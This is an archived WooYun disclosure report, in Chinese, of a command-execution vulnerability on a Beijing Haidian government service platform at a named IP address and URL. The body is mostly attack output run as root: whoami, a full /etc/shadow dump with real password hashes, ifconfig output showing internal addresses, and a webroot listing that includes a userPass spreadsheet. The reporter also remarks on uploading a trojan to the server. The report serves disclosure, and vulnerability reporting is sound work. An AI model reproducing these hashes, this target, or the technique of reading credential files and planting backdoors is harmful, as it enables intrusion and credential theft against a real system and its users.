乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-25: 细节已通知厂商并且等待厂商处理中 2015-06-29: 厂商已经确认,细节仅向厂商公开 2015-07-09: 细节向核心白帽子及相关领域专家公开 2015-07-19: 细节向普通白帽子公开 2015-07-29: 细节向实习白帽子公开 2015-08-13: 细节向公众公开
北京海淀区政府的智慧政务综合服务平台命令执行漏洞
地址http://61.49.38.13:8888/noticeDetail.action?itemId=8a2530114843ba4d01497a73262a009c存在命令执行漏洞
whoami
root
cat /etc/shadow
root:$1$Dd9jGRAX$9J.EFVS1cDRq5OXQtvpTc/:16253:0:99999:7:::bin:*:16196:0:99999:7:::daemon:!:16196:0:99999:7:::adm:!:16196:0:99999:7:::lp:!:16196:0:99999:7:::sync:!:16196:0:99999:7:::shutdown:*:16196:0:99999:7:::halt:!:16196:0:99999:7:::mail:!:16196:0:99999:7:::news:!:16196:0:99999:7:::uucp:!:16196:0:99999:7:::operator:*:16196:0:99999:7:::games:!:16196:0:99999:7:::gopher:!:16196:0:99999:7:::ftp:!:16196:0:99999:7:::nobody:!:16196:0:99999:7:::distcache:!!:16196:0:99999:7:::nscd:!!:16196:0:99999:7:::vcsa:!!:16196:0:99999:7:::pcap:!!:16196:0:99999:7:::ntp:!!:16196:0:99999:7:::dbus:!!:16196:0:99999:7:::apache:!!:16196:0:99999:7:::avahi:!!:16196:0:99999:7:::rpc:!!:16196:0:99999:7:::named:!!:16196:0:99999:7:::mailnull:!!:16196:0:99999:7:::smmsp:!!:16196:0:99999:7:::hsqldb:!!:16196:0:99999:7:::sshd:!!:16196:0:99999:7:::webalizer:!!:16196:0:99999:7:::dovecot:!!:16196:0:99999:7:::squid:!!:16196:0:99999:7:::rpcuser:!!:16196:0:99999:7:::nfsnobody:!!:16196:0:99999:7:::xfs:!!:16196:0:99999:7:::haldaemon:!!:16196:0:99999:7:::avahi-autoipd:!!:16196:0:99999:7:::gdm:!!:16196:0:99999:7:::piranha:!!:16196::::::mysql:!!:16196::::::touchcap:$1$YaItdydt$XkksOR2snEkzmCDEMzrnX1:16196:0:99999:7:::avonaco:$1$.FFDZ1eW$J486jemGhP9tU1Cpk6MwV1:16263:30:90:7:::clamav:!!:16266::::::oracle:$1$IPu8W87K$YvEl0SD5bEfucioGlu17x/:16533:30:90:7:::community:$1$BAm.TAbA$YQZb/hRELSZJw.sZJRRV10:16399:30:90:7:::
ifconfig
eth0 Link encap:Ethernet HWaddr 00:25:90:5A:3F:18 inet addr:10.165.176.73 Bcast:10.165.176.255 Mask:255.255.255.0 inet6 addr: fe80::225:90ff:fe5a:3f18/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:62421969 errors:0 dropped:0 overruns:0 frame:0 TX packets:395437 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:2696239419 (2.5 GiB) TX bytes:185949678 (177.3 MiB) Memory:fafe0000-fb000000 eth1 Link encap:Ethernet HWaddr 00:25:90:5A:3F:19 inet addr:192.168.2.6 Bcast:192.168.2.255 Mask:255.255.255.0 inet6 addr: fe80::225:90ff:fe5a:3f19/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:231941550 errors:0 dropped:0 overruns:0 frame:0 TX packets:2908183 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:2556281533 (2.3 GiB) TX bytes:41
ls /hdzw_wai/WebRoot/
404.jsp500.jsp502.jspMETA-INFWEB-INFattachmentcheckError.jspcssdataplatdo-not-submit-again.jspecaerror.jsperror_go.jspiframe_login.jspimagesindex.jspitemorgjsjspjw.htmljw.jsplogin.jsplogin1.jspmytesttest.jspocxphoneLinkregister.jspsqlError.jspssotest.jspuserDoc.docuserPass.xlsuserPass.xlsx????????????????????????
开始传马进服务器,呵呵
加强安全意识
危害等级:高
漏洞Rank:11
确认时间:2015-06-29 18:22
CNVD确认所述情况,已经转由CNCERT下发给北京分中心,由其后续协调网站管理单位处置。
暂无